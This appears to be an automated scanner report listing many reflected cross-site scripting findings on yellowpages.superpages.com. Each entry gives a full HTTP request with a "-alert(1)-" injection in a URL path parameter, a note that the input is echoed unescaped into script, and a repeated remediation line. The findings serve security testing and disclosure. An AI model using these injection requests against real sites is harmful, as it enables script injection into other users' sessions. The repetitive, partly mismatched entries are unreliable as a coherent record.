Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c0b"-alert(1)-"1189d0fb19e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696df"-alert(1)-"ae58cd1d73c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e37"-alert(1)-"a77217be230 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common27e37"-alert(1)-"a77217be230/css/forms.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7342"-alert(1)-"107199becab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssf7342"-alert(1)-"107199becab/forms.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1c09"-alert(1)-"6f31add0046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/forms.cssf1c09"-alert(1)-"6f31add0046 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"96068b15aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common3fdca"-alert(1)-"96068b15aaf/css/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef7bf"-alert(1)-"eed6ae6e6f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a006a"-alert(1)-"cbff4859ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/print.cssa006a"-alert(1)-"cbff4859ae5 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1ff"-alert(1)-"dc2efa902dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95a34"-alert(1)-"686e302e816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css95a34"-alert(1)-"686e302e816/reset.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aabb"-alert(1)-"23c3bf4d12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/reset.css3aabb"-alert(1)-"23c3bf4d12 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15d"-alert(1)-"4cb99c62a1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c75f4"-alert(1)-"02b021d68ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec1e7"-alert(1)-"03bc909001e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c20"-alert(1)-"e4243f6ac8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8cb3"-alert(1)-"ad160d53bf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fc04"-alert(1)-"230ea56f1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97191"-alert(1)-"a26cfc23980 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3da"-alert(1)-"acb1d78ef25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa201"-alert(1)-"737b17cce6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53209"-alert(1)-"19f62aec85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common53209"-alert(1)-"19f62aec85/css/sppromoads.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c53f7"-alert(1)-"f0b92738dcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6905"-alert(1)-"628f1c95393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4770c"-alert(1)-"4414bf7cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4770c"-alert(1)-"4414bf7cc3/css/structure.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee76"-alert(1)-"0d4decbeb19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
